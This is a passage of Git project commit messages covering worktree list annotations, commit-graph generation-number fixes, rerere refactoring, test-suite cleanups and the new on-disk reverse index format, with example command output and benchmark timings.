but is otherwise used assuming it has been populated. The loop in
compute_generation_numbers() did not enforce that all reachable
commits were parsed and had correct values. This could lead to some
problems when writing a commit-graph with corrected commit dates based
on a commit-graph without them.
It has been difficult to identify the issue here because it was so hard
to reproduce. It relies on this uninitialized data having a non-zero
value, but also on specifically in a way that overwrites the existing
data.
This patch adds the extra parse to ensure the data is filled before we
compute the generation number of a commit. This triggers the new test
to fail because the generation number overflow count does not match
between this computation and the write for that chunk.
The actual fix will follow as the next few changes.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The write_commit_graph_context has a repository pointer, so use it.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a comment at the beggining of remove_redundant() that mentions a
reordering of the input array to have the initial segment be the
independent commits and the final segment be the redundant commits.
While this behavior is followed in remove_redundant(), no callers rely
on that behavior.
Remove the final loop that copies this final segment and update the
comment to match the new behavior.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test case added by 9466e3809d ("blame: enable funcname blaming with
userdiff driver", 2020-11-01) forgot to quote variable expansions. This
causes failures when the current directory contains blanks.
One variable that the test case introduces will not have IFS characters
and could remain without quotes, but let's quote all expansions for
consistency, not just the one that has the path name.
Signed-off-by: Johannes Sixt <j6t@kdbg.org>
Acked-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git worktree list" annotates each worktree according to its state such
as "prunable" or "locked", however it is not immediately obvious why
these worktrees are being annotated. For prunable worktrees a reason
is available that is returned by should_prune_worktree() and for locked
worktrees a reason might be available provided by the user via `lock`
command.
Let's teach "git worktree list" a --verbose mode that outputs the reason
why the worktrees are being annotated. The reason is a text that can take
virtually any size and appending the text on the default columned format
will make it difficult to extend the command with other annotations and
not fit nicely on the screen. In order to address this shortcoming the
annotation is then moved to the next line indented followed by the reason
If the reason is not available the annotation stays on the same line as
the worktree itself.
The output of "git worktree list" with verbose becomes like so:
$ git worktree list --verbose
...
/path/to/locked-no-reason acb124 [branch-a] locked
/path/to/locked-with-reason acc125 [branch-b]
locked: worktree with a locked reason
/path/to/prunable-reason ace127 [branch-d]
prunable: gitdir file points to non-existent location
...
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "git worktree list" command shows the absolute path to the worktree,
the commit that is checked out, the name of the branch, and a "locked"
annotation if the worktree is locked, however, it does not indicate
whether the worktree is prunable.
The "prune" command will remove a worktree if it is prunable unless
`--dry-run` option is specified. This could lead to a worktree being
removed without the user realizing before it is too late, in case the
user forgets to pass --dry-run for instance. If the "list" command shows
which worktree is prunable, the user could verify before running
"git worktree prune" and hopefully prevents the working tree to be
removed "accidentally" on the worse case scenario.
Let's teach "git worktree list" to show when a worktree is a prunable
candidate for both default and porcelain format.
In the default format a "prunable" text is appended:
$ git worktree list
/path/to/main aba123 [main]
/path/to/linked 123abc [branch-a]
/path/to/prunable ace127 (detached HEAD) prunable
In the --porcelain format a prunable label is added followed by
its reason:
$ git worktree list --porcelain
...
worktree /path/to/prunable
HEAD abc1234abc1234abc1234abc1234abc1234abc12
detached
prunable gitdir file points to non-existent location
...
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit c57b3367be (worktree: teach `list` to annotate locked worktree,
2020-10-11) taught "git worktree list" to annotate locked worktrees by
appending "locked" text to its output, however, this is not listed in
the --porcelain format.
Teach "list --porcelain" to do the same and add a "locked" attribute
followed by its reason, thus making both default and porcelain format
consistent. If the locked reason is not available then only "locked"
is shown.
The output of the "git worktree list --porcelain" becomes like so:
$ git worktree list --porcelain
...
worktree /path/to/locked
HEAD 123abcdea123abcd123acbd123acbda123abcd12
detached
locked
worktree /path/to/locked-with-reason
HEAD abc123abc123abc123abc123abc123abc123abc1
detached
locked reason why it is locked
...
In porcelain mode, if the lock reason contains special characters
such as newlines, they are escaped with backslashes and the entire
reason is enclosed in double quotes. For example:
$ git worktree list --porcelain
...
locked "worktree's path mounted in\nremovable device"
...
Furthermore, let's update the documentation to state that some
attributes in the porcelain format might be listed alone or together
with its value depending whether the value is available or not. Thus
documenting the case of the new "locked" attribute.
Helped-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
c57b3367be (worktree: teach `list` to annotate locked worktree,
2020-10-11) introduced a new test to ensure locked worktrees are listed
with "locked" annotation. However, the test does not clean up after
itself as "git worktree prune" is not going to remove the locked worktree
in the first place. This not only leaves the test in an unclean state it
also potentially breaks following tests that rely on the
"git worktree list" output.
Let's fix that by unlocking the worktree before the "prune" command.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
worktree_lock_reason() aborts with an assertion failure when called on
the main worktree since locking the main worktree is nonsensical. Not
only is this behavior undocumented, thus callers might not even be aware
that the call could potentially crash the program, but it also forces
clients to be extra careful:
if (!is_main_worktree(wt) && worktree_locked_reason(...))
...
Since we know that locking makes no sense in the context of the main
worktree, we can simply return false for the main worktree, thus making
client code less complex by eliminating the need for the callers to have
inside knowledge about the implementation:
if (worktree_lock_reason(...))
...
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add worktree_prune_reason() to allow a caller to discover whether a
worktree is prunable and the reason that it is, much like
worktree_lock_reason() indicates whether a worktree is locked and the
reason for the lock. As with worktree_lock_reason(), retrieve the
prunable reason lazily and cache it in the `worktree` structure.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As part of teaching "git worktree list" to annotate worktree that is a
candidate for pruning, let's move should_prune_worktree() from
builtin/worktree.c to worktree.c in order to make part of the worktree
public API.
should_prune_worktree() knows how to select the given worktree for
pruning based on an expiration date, however the expiration value is
stored in a static file-scope variable and it is not local to the
function. In order to move the function, teach should_prune_worktree()
to take the expiration date as an argument and document the new
parameter that is not immediately obvious.
Also, change the function comment to clearly state that the worktree's
path is returned in `wtpath` argument.
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Rafael Silva <rafaeloliveira.cs@gmail.com>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Using "1~5" isn't portable. Nobody seems to have noticed, since perhaps
people don't tend to run the perf suite on more exotic platforms. Still,
it's better to set a good example.
We can use:
perl -ne 'print if $. % 5 == 1'
instead. But we can further observe that perl does a good job of the
other parts of this pipeline, and fold the whole thing together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Right now, the test suite can be run with 'GIT_TEST_WRITE_REV_INDEX=1'
in the environment, which causes all operations which write a pack to
also write a .rev file.
To prepare for when that eventually becomes the default, we should
continue to test the in-memory reverse index, too, in order to avoid
losing existing coverage. Unfortunately, explicit existing coverage is
rather sparse, so only a basic test is added that compares the result of
git rev-list --objects --no-object-names --all |
git cat-file --batch-check='%(objectsize:disk) %(objectname)'
with and without an on-disk reverse index.
Suggested-by: Jeff King <peff@peff.net>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we expand a user-format, we try to avoid work that isn't necessary
for the output. For instance, we don't bother parsing the commit header
until we know we need the author, subject, etc.
But we do always load the commit object's contents from disk, even if
the format doesn't require it (e.g., just "%H"). Traditionally this
didn't matter much, because we'd have loaded it as part of the traversal
anyway, and we'd typically have those bytes attached to the commit
struct (or these days, cached in a commit-slab).
But when we have a commit-graph, we might easily get to the point of
pretty-printing a commit without ever having looked at the actual object
contents. We should push off that load (and reencoding) until we're
certain that it's needed.
I think the results of p4205 show the advantage pretty clearly (we serve
parent and tree oids out of the commit struct itself, so they benefit as
well):
# using git.git as the test repo
Test HEAD^ HEAD
----------------------------------------------------------------------
4205.1: log with %H 0.40(0.39+0.01) 0.03(0.02+0.01) -92.5%
4205.2: log with %h 0.45(0.44+0.01) 0.09(0.09+0.00) -80.0%
4205.3: log with %T 0.40(0.39+0.00) 0.04(0.04+0.00) -90.0%
4205.4: log with %t 0.46(0.46+0.00) 0.09(0.08+0.01) -80.4%
4205.5: log with %P 0.39(0.39+0.00) 0.03(0.03+0.00) -92.3%
4205.6: log with %p 0.46(0.46+0.00) 0.10(0.09+0.00) -78.3%
4205.7: log with %h-%h-%h 0.52(0.51+0.01) 0.15(0.14+0.00) -71.2%
4205.8: log with %an-%ae-%s 0.42(0.41+0.00) 0.42(0.41+0.01) +0.0%
# using linux.git as the test repo
Test HEAD^ HEAD
----------------------------------------------------------------------
4205.1: log with %H 7.12(6.97+0.14) 0.76(0.65+0.11) -89.3%
4205.2: log with %h 7.35(7.19+0.16) 1.30(1.19+0.11) -82.3%
4205.3: log with %T 7.58(7.42+0.15) 1.02(0.94+0.08) -86.5%
4205.4: log with %t 8.05(7.89+0.15) 1.55(1.41+0.13) -80.7%
4205.5: log with %P 7.12(7.01+0.10) 0.76(0.69+0.07) -89.3%
4205.6: log with %p 7.38(7.27+0.10) 1.32(1.20+0.12) -82.1%
4205.7: log with %h-%h-%h 7.81(7.67+0.13) 1.79(1.67+0.12) -77.1%
4205.8: log with %an-%ae-%s 7.90(7.74+0.15) 7.81(7.66+0.15) -1.1%
I added the final test to show where we don't improve (the 1% there is
just lucky noise), but also as a regression test to make sure we're not
doing anything stupid like loading the commit multiple times when there
are several placeholders that need it.
Reported-by: Michael Haggerty <mhagger@alum.mit.edu>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 6e98de72c0 (sequencer (rebase -i): add support for the 'fixup' and
'squash' commands, 2017-01-02), this developer introduced a change of
behavior by mistake: when encountering a `fixup!` commit (or multiple
`fixup!` commits) without any `squash!` commit thrown in, the final `git
commit` was invoked with `--cleanup=strip`. Prior to that commit, the
commit command had been called without that `--cleanup` option.
Since we explicitly read the original commit message from a file in that
case, there is really no sense in forcing that clean-up.
We actually need to actively suppress that clean-up lest a configured
`commit.cleanup` may interfere with what we want to do: leave the commit
message unchanged.
Reported-by: Vojtěch Knyttl <vojtech@knyt.tl>
Helped-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we use the sub-test helpers, we end up defining one shell snippet
inside another shell snippet. So if we use single-quotes for the outer
snippet, we have to use double-quotes within the inner snippet (it's
included as here-doc within the outer snippet, but using a single quote
would end the outer snippet early). Or vice versa we can use double
quotes for the outer snippet, but then single quotes in the inner.
We have some of each in the script, and neither is wrong. But it would
be nice to be consistent unless there is a good reason not to. Using
single quotes for the outer script is preferable, because it requires
less metacharacter quoting overall. For example, in:
test_expect_success 'outer' '
run_sub_test_lib_test ... <<-\EOF
echo $foo &&
test_expect_success "inner" "
echo \$bar
"
EOF
'
we need only quote inside "inner", but not inside "outer" or the
here-doc. Whereas if we flip them, we have to quote in both places:
test_expect_success 'outer' "
run_sub_test_lib_test ... <<-\EOF
echo \$foo &&
test_expect_success 'inner' '
echo \$bar
'
EOF
"
The exception is when we need a literal single-quote in an expected
output here-doc. There we can either use outer double-quotes, or just
use ${SQ} within the doc. I chose the latter for consistency (within
this test, but also with other test scripts that face the same problem).
There is one other interesting case, which is some tests that do:
test_expect_success ... "
do_something --run='"'!3'"'
"
This is rather confusing to read, but is correct. The outer script sees
'!3' in single-quotes, as does the eval'd snippet. This is perhaps being
overly cautious. In many interactive shells, an exclamation triggers
history expansion even inside double quotes, but that is not generally
true in non-interactive shells.
There's some conflicting information here. Commit 784ce03d55 (t4216:
avoid unnecessary subshell in test_bloom_filters_not_used, 2020-05-19)
reports it as a problem with OpenBSD 6.7's /bin/sh. However, we have
many instances in this script of prereqs like !LAZY_TRUE, which haven't
been a problem. I left them un-escaped here to test out this theory.
It's much nicer if we can not worry about this as a portability issue,
so it's worth knowing.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our check of test_when_finished is done directly in the main script, and
if we failed to clean, we complain and exit immediately. It's nicer to
signal a test failure here, for a few reasons:
- this gives better output to the user when run under a TAP harness
like "prove"
- constency; it's the only test left in the file that behaves this way
- half of its "if" conditional is nonsense anyway; it picked up a
reference to GIT_TEST_FAIL_PREREQS_INTERNAL in dfe1a17df9 (tests:
add a special setup where prerequisites fail, 2019-05-13) along with
its neighbors, even though it has nothing to do with that flag
We could actually do this without a sub-test at all, and just put our
two tests (one to do cleanup, and one to check that it happened) in the
main script. But doing it in a subtest is conceptually cleaner (from the
perspective of the main test script, we are checking only one thing),
and it remains consistent with the "cleanup when failing" test directly
after it, which has to happen in a sub-test (to avoid the main script
complaining of the failed test).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We test the behavior of prerequisites in t0000 by setting up fake ones
in the main test script, trying to run some tests, and then seeing if
those tests impacted the environment correctly. If they didn't, then we
write a message and manually call exit.
Instead, let's push these down into a sub-test, like many of the other
tests covering the framework itself. This has a few advantages:
- it does not pollute the test output with mention of skipped tests
(that we know are uninteresting -- the point of the test was to see
that these are skipped).
- when running in a TAP harness, we get a useful test failure message
(whereas when the script exits early, a tool like "prove" simply
says "Dubious, test returned 1").
- we do not have to worry about different test environments, such as
when GIT_TEST_FAIL_PREREQS_INTERNAL is set. Our sub-test helpers
already give us a known environment.
- the tests themselves are a bit easier to read, as we can just check
the test-framework output to see what happened (and get the usual
test_cmp diff if it failed)
A few notes on the implementation:
- we could do one sub-test per each individual test_expect_success. I
broke it up here into a few logical groups, as I think this makes it
more readable
- the original tests modified environment variables inside the test
bodies. Instead, I've used "true" as the body of a test we expect to
run and "false" otherwise. Technically this does not confirm that
the body of the "true" test actually ran. We are trusting the
framework output to believe that it truly ran, which is sufficient
for these tests. And I think the end result is much simpler to
follow.
- the nested_prereq test uses a few bare "test -f" calls; I converted
these to our usual test_path_is_* helpers while moving the code
around.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We check that test_when_finished cleans up after a test, and that it
runs even after a failure. Those two were originally adjacent, but got
split apart by the new test added in 477dcaddb6 (tests: do not let lazy
prereqs inside `test_expect_*` turn off tracing, 2020-03-26), and then
further by more lazy-prereq tests. Let's move them back together.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we are looking up an oid in an array, we obviously don't need to
write to the array. Let's mark it as const in the function interfaces,
as well as in the local variables we use to derference the void pointer
(note a few cases use pointers-to-pointers, so we mark everything
const).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
All of our callers are actually looking up an object_id, not a bare
hash. Likewise, the arrays they are looking in are actual arrays of
object_id (not just raw bytes of hashes, as we might find in a pack
.idx; those are handled by bsearch_hash()).
Using an object_id gives us more type safety, and makes the callers
slightly shorter. It also gets rid of the word "sha1" from several
access functions, though we could obviously also rename those with
s/sha1/hash/.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We store a struct for each directory we access under .git/rr-cache. The
structs are kept in an array sorted by the binary hash associated with
their name (and we do lookups with a binary search).
This works OK, but there are a few small downsides:
- the amount of code isn't huge, but it's more than we'd need using one
of our other stock data structures
- the insertion into a sorted array is quadratic (though in practice
it's unlikely anybody has enough conflicts for this to matter)
- it's intimately tied to the representation of an object hash. This
isn't a big deal, as the conflict ids we generate use the same hash,
but it produces a few awkward bits (e.g., we are the only user of
hash_pos() that is not using object_id).
Let's instead just treat the directory names as strings, and store them
in a strmap. This is less code, and removes the use of hash_pos().
Insertion is now non-quadratic, though we probably use a bit more
memory. Besides the hash table overhead, and storing hex bytes instead
of a binary hash, we actually store each name twice. Other code expects
to access the name of a rerere_dir struct from the struct itself, so we
need a copy there. But strmap keeps its own copy of the name, as well.
Using a bare hashmap instead of strmap means we could use the name for
both, but at the cost of extra code (e.g., our own comparison function).
Likewise, strmap has a feature to use a pointer to the in-struct name at
the cost of a little extra code. I didn't do either here, as simple code
seemed more important than squeezing out a few bytes of efficiency.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We check only that get_sha1_hex() doesn't complain, which means we'd
match an all-hex name with trailing cruft after it. This probably
doesn't matter much in practice, since there shouldn't be anything else
in the rr-cache directory, but it could possibly cause us to mix up sha1
and sha256 entries (which also shouldn't be intermingled, but could be
leftovers from a repository conversion).
Note that "get_sha1_hex()" is a confusing historical name. It is
actually using the_hash_algo, so it would be sha256 in a sha256 repo.
We'll switch to using parse_oid_hex(), because that conveniently
advances our pointer. But it also gets rid of the sha1 name. Arguably
it's a little funny to use "object_id" here for something that isn't
actually naming an object, but it's unlikely to be a problem (and is
contained in a single function).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In rerere_gc(), we walk over the .git/rr_cache directory and create a
struct for each entry we find. We feed any name we get from readdir() to
find_rerere_dir(), which then calls get_sha1_hex() on it (since we use
the binary hash as a lookup key). If that fails (i.e., the directory
name is not what we expected), it returns NULL. But the comment in
find_rerere_dir() says "BUG".
It _would_ be a bug for the call from new_rerere_id_hex(), the only
other code path, to fail here; it's generating the hex internally. But
the call in rerere_gc() is using it say "is this a plausible directory
name".
Let's instead have rerere_gc() do its own "is this plausible" check.
That has two benefits:
- we can now reliably BUG() inside find_rerere_dir(), which would
catch bugs in the other code path (and we now will never return NULL
from the function, which makes it easier to see that a rerere_id
struct will always have a non-NULL "collection" field).
- it makes the use of the binary hash an implementation detail of
find_rerere_dir(), not known by callers. That will free us up to
change it in a future patch.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
All of our callers have an object_id, and are just dereferencing the
hash field to pass to us. Let's take the actual object_id instead. We
still access the hash to pass to hash_pos, but it's a step in the right
direction.
This makes the callers slightly simpler, but also gets rid of the
untyped pointer, as well as the now-inaccurate name "sha1".
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Fix a bug in upload-pack.c that occurs when you combine partial
clone and uploadpack.packObjectsHook. You can reproduce it as
follows:
git clone -u 'git -c uploadpack.allowfilter '\
'-c uploadpack.packobjectshook=env '\
'upload-pack' --filter=blob:none --no-local \
src.git dst.git
Be careful with the line endings because this has a long quoted
string as the -u argument.
The error I get when I run this is:
Cloning into '/tmp/broken'...
remote: fatal: invalid filter-spec ''blob:none''
error: git upload-pack: git-pack-objects died with error.
fatal: git upload-pack: aborting due to possible repository corruption on the remote side.
remote: aborting due to possible repository corruption on the remote side.
fatal: early EOF
fatal: index-pack failed
The problem is caused by unneeded quoting.
This bug was already present in 10ac85c785 (upload-pack: add object
filtering for partial clone, 2017-12-08) when the server side filter
support was introduced. In fact, in 10ac85c785 this was broken
regardless of uploadpack.packObjectsHook. Then in 0b6069fe0a
(fetch-pack: test support excluding large blobs, 2017-12-08) the
quoting was removed but only behind a conditional that depends on
whether uploadpack.packObjectsHook is set.
Because uploadpack.packObjectsHook is apparently rarely used, nobody
noticed the problematic quoting could still happen.
Remove the conditional quoting and add a test for partial clone in
t5544-pack-objects-hook.
Signed-off-by: Jacob Vosmaer <jacob@gitlab.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We allow variadic macros in the code base, but only if there is fallback
code for platforms that lack it. This leads to some annoyances:
- the code is more complicated because of the fallbacks (e.g.,
trace_printf(), etc, is implemented twice with a set of parallel
wrappers).
- some constructs are just impossible and we've had to live without
them (e.g., a cross between FLEX_ALLOC and xstrfmt)
Since this feature is present in C99, we may be able to start counting
on it being available everywhere. Let's start with a weather balloon
patch to find out.
This patch makes the absolute minimal change by always setting
HAVE_VARIADIC_MACROS. If somebody runs into a platform where it's a
problem, they can undo it by commenting out the define. Likewise, if we
have to revert this, it would be quite unlikely to cause conflicts.
Once we feel comfortable that this is the right direction, then we can
start ripping out all the spots that actually look at the flag, and
removing the dead code.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The CI/PR GitHub Actions workflow uses the 'matrix' strategy for the
"windows-test", "vs-test", "regular" and "dockerized" jobs. The default
behaviour of GitHub Actions is to cancel all in-progress jobs in a
matrix if one of the job of the matrix fails [1].
This is not ideal as a failure early in a job, like during installation of
the build/test dependencies on a specific platform, leads to the
cancellation of all other jobs in the matrix.
Set the 'fail-fast' variable to 'false' for all four matrix jobs in the
workflow.
[1] https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstrategyfail-fast
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, when called with exactly two arguments, `git range-diff`
tests for a literal `..` in each of the two. Likewise, the argument
provided via `--range-diff` to `git format-patch` is checked in the same
manner.
However, `<commit>^!` is a perfectly valid commit range, equivalent to
`<commit>^..<commit>` according to the `SPECIFYING RANGES` section of
gitrevisions[7].
In preparation for allowing more sophisticated ways to specify commit
ranges, let's refactor the check into its own function.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'./t1234-foo.sh --stress-jobs=X ...' is supposed to run that test
script in X parallel jobs, but the number of jobs specified on the
command line is entirely ignored if other '--stress'-related options
follow. I.e. both './t1234-foo.sh --stress-jobs=X --stress-limit=Y'
and './t1234-foo.sh --stress-jobs=X --stress' fall back to using twice
the number of CPUs parallel jobs instead.
The former has been broken since commit de69e6f6c9 (tests: let
--stress-limit=<N> imply --stress, 2019-03-03) [1], which started to
unconditionally overwrite the $stress variable holding the specified
number of jobs in its effort to imply '--stress'. The latter has been
broken since f545737144 (tests: introduce --stress-jobs=<N>,
2019-03-03), because it didn't consider that handling '--stress' will
overwrite that variable as well.
We could fix this by being more careful about (over)writing that
$stress variable and checking first whether it has already been set.
But I think it's cleaner to use a dedicated variable to hold the
number of specified parallel jobs, so let's do that instead.
[1] In de69e6f6c9 there was no '--stress-jobs=X' option yet, the
number of parallel jobs had to be specified via '--stress=X', so,
strictly speaking, de69e6f6c9 broke './t1234-foo.sh --stress=X
--stress-limit=Y'.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove the hidden "grep --debug" and "log --grep-debug" options added
in 17bf35a3c7 (grep: teach --debug option to dump the parse tree,
2012-09-13).
At the time these options seem to have been intended to go along with
a documentation discussion and to help the author of relevant tests to
perform ad-hoc debugging on them[1].
Reasons to want this gone:
1. They were never documented, and the only (rather trivial) use of
them in our own codebase for testing is something I removed back
in e01b4dab01 (grep: change non-ASCII -i test to stop using
--debug, 2017-05-20).
2. Googling around doesn't show any in-the-wild uses I could dig up,
and on the Git ML the only mentions after the original discussion
seem to have been when they came up in unrelated diff contexts, or
that test commit of mine.
3. An exception to that is c581e4a749 (grep: under --debug, show
whether PCRE JIT is enabled, 2019-08-18) where we added the
ability to dump out when PCREv2 has the JIT in effect.
The combination of that and my earlier b65abcafc7 (grep: use PCRE
v2 for optimized fixed-string search, 2019-07-01) means Git prints
this out in its most common in-the-wild configuration:
$ git log --grep-debug --grep=foo --grep=bar --grep=baz --all-match
pcre2_jit_on=1
pcre2_jit_on=1
pcre2_jit_on=1
[all-match]
(or
pattern_body<body>foo
(or
pattern_body<body>bar
pattern_body<body>baz
)
)
$ git grep --debug \( -e foo --and -e bar \) --or -e baz
pcre2_jit_on=1
pcre2_jit_on=1
pcre2_jit_on=1
(or
(and
patternfoo
patternbar
)
patternbaz
)
I.e. for each pattern we're considering for the and/or/--all-match
etc. debugging we'll now diligently spew out another identical line
saying whether the PCREv2 JIT is on or not.
I think that nobody's complained about that rather glaringly obviously
bad output says something about how much this is used, i.e. it's
not.
The need for this debugging aid for the composed grep/log patterns
seems to have passed, and the desire to dump the JIT config seems to
have been another one-off around the time we had JIT-related issues on
the PCREv2 codepath. That the original author of this debugging
facility seemingly hasn't noticed the bad output since then[2] is
probably some indicator.
1. https://lore.kernel.org/git/cover.1347615361.git.git@drmicha.warpmail.net/
2. https://lore.kernel.org/git/xmqqk1b8x0ac.fsf@gitster-ct.c.googlers.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When an on-disk reverse index exists, there is no need to generate one
in memory. In fact, doing so can be slow, and require large amounts of
the heap.
Let's make sure that we treat the on-disk reverse index with precedence
(i.e., that when it exists, we don't bother trying to generate an
equivalent one in memory) by teaching Git how to conditionally die()
when generating a reverse index in memory.
Then, add a test to ensure that when (a) an on-disk reverse index
exists, and (b) when setting GIT_TEST_REV_INDEX_DIE_IN_MEMORY, that we
do not die, implying that we read from the on-disk one.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a new option that unconditionally enables the pack.writeReverseIndex
setting in order to run the whole test suite in a mode that generates
on-disk reverse indexes. Additionally, enable this mode in the second
run of tests under linux-gcc in 'ci/run-build-and-tests.sh'.
Once on-disk reverse indexes are proven out over several releases, we
can change the default value of that configuration to 'true', and drop
this patch.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the next patch, we'll add support for unconditionally enabling the
'pack.writeReverseIndex' setting with a new GIT_TEST_WRITE_REV_INDEX
environment variable.
This causes a little bit of fallout with tests that, for example,
compare the list of files in the pack directory being unprepared to see
.rev files in its output.
Those locations can be cleaned up to look for specific file extensions,
rather than take everything in the pack directory (for instance) and
then grep out unwanted items.
Once the pack.writeReverseIndex option has been thoroughly
tested, we will default it to 'true', removing GIT_TEST_WRITE_REV_INDEX,
and making it possible to revert this patch.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that the pack.writeReverseIndex configuration is respected in both
'git index-pack' and 'git pack-objects' (and therefore, all of their
callers), we can safely advertise it for use in the git-config manual.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that we have an implementation that can write the new reverse index
format, enable writing a .rev file in 'git pack-objects' by consulting
the pack.writeReverseIndex configuration variable.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach 'git index-pack' to optionally write and verify reverse index with
'--[no-]rev-index', as well as respecting the 'pack.writeReverseIndex'
configuration option.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To derive the filename for a .idx file, 'git index-pack' uses
derive_filename() to strip the '.pack' suffix and add the new suffix.
Prepare for stripping off suffixes other than '.pack' by making the
suffix to strip a parameter of derive_filename(). In order to make this
consistent with the "suffix" parameter which does not begin with a ".",
an additional check in derive_filename.
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch prepares for callers to be able to write reverse index files
to disk.
It adds the necessary machinery to write a format-compliant .rev file
from within 'write_rev_file()', which is called from
'finish_tmp_packfile()'.
Similar to the process by which the reverse index is computed in memory,
these new paths also have to sort a list of objects by their offsets
within a packfile. These new paths use a qsort() (as opposed to a radix
sort), since our specialized radix sort requires a full revindex_entry
struct per object, which is more memory than we need to allocate.
The qsort is obviously slower, but the theoretical slowdown would
require a repository with a large amount of objects, likely implying
that the time spent in, say, pack-objects during a repack would dominate
the overall runtime.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Specify the format of the on-disk reverse index 'pack-*.rev' file, as
well as prepare the code for the existence of such files.
The reverse index maps from pack relative positions (i.e., an index into
the array of object which is sorted by their offsets within the
packfile) to their position within the 'pack-*.idx' file. Today, this is
done by building up a list of (off_t, uint32_t) tuples for each object
(the off_t corresponding to that object's offset, and the uint32_t
corresponding to its position in the index). To convert between pack and
index position quickly, this array of tuples is radix sorted based on
its offset.
This has two major drawbacks:
First, the in-memory cost scales linearly with the number of objects in
a pack. Each 'struct revindex_entry' is sizeof(off_t) +
sizeof(uint32_t) + padding bytes for a total of 16.
To observe this, force Git to load the reverse index by, for e.g.,
running 'git cat-file --batch-check="%(objectsize:disk)"'. When asking
